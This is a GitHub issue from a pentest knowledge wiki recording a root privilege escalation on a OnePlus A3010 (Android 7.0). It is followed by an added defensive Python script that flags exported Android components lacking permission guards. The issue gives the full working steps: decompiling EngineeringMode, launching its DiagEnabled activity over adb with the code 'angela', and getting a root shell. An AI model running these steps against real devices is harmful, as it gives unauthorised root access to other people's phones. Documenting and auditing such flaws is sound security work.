nixawk / pentest-wiki

PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.
MIT License

[privilege escalation] ONEPLUS phone #23

Open nixawk opened 6 years ago

nixawk commented 6 years ago

Tested on ONEPLUS A3010

$ adb shell getprop ro.build.version.release
7.0

$ adb shell pm list packages -f
$ adb pull /system/app/EngineeringMode/ EngineeringMode.apk
$ cd EngineeringMode.apk
$ apktool d EngineeringMode.apk
$ grep -Ri "com.android.engineeringmode" EngineeringMode/AndroidManifest.xml

        <activity android:configChanges="keyboardHidden|orientation" android:name=".qualcomm.QualCommNvShow"/>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:name=".qualcomm.DiagEnabled" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="com.android.engineeringmode.qualcomm.DiagEnabled"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
Starting: Intent { cmp=com.android.engineeringmode/.qualcomm.DiagEnabled (has extras) }
$ adb shell id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0
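
Added example, not part of the original issue or of the pentest-wiki project: a defender-side audit of an apktool-decoded `AndroidManifest.xml` that flags components which, like `.qualcomm.DiagEnabled` above, declare an intent-filter (and are therefore exported by default on this Android version) without requiring a permission. The sample manifest is constructed from the excerpt above; the `.Guarded` activity and its permission name are assumptions for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample modelled on the manifest excerpt above; the ".Guarded"
# activity and "example.permission.DIAG" are hypothetical.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.android.engineeringmode">
  <application>
    <activity android:name=".qualcomm.QualCommNvShow"/>
    <activity android:name=".qualcomm.DiagEnabled">
      <intent-filter>
        <action android:name="com.android.engineeringmode.qualcomm.DiagEnabled"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".Guarded" android:permission="example.permission.DIAG">
      <intent-filter><action android:name="example.GUARDED"/></intent-filter>
    </activity>
  </application>
</manifest>"""


def unprotected_exported(manifest_xml):
    """Return names of components other apps can reach without any permission."""
    app = ET.fromstring(manifest_xml).find("application")
    if app is None:
        return []
    app_perm = app.get(A + "permission")  # application-wide default permission
    findings = []
    # Providers are skipped: their export default depends on the target SDK.
    for tag in ("activity", "activity-alias", "service", "receiver"):
        for comp in app.iter(tag):
            exported = comp.get(A + "exported")
            has_filter = comp.find("intent-filter") is not None
            # Before Android 12, an intent-filter implies exported="true"
            # unless the attribute is set explicitly.
            is_exported = exported == "true" or (exported is None and has_filter)
            if is_exported and not (comp.get(A + "permission") or app_perm):
                findings.append(comp.get(A + "name"))
    return findings


if __name__ == "__main__":
    for name in unprotected_exported(SAMPLE_MANIFEST):
        print("exported without permission:", name)
```

Each flagged component needs review: either set `android:exported="false"`, or guard it with a signature-level permission.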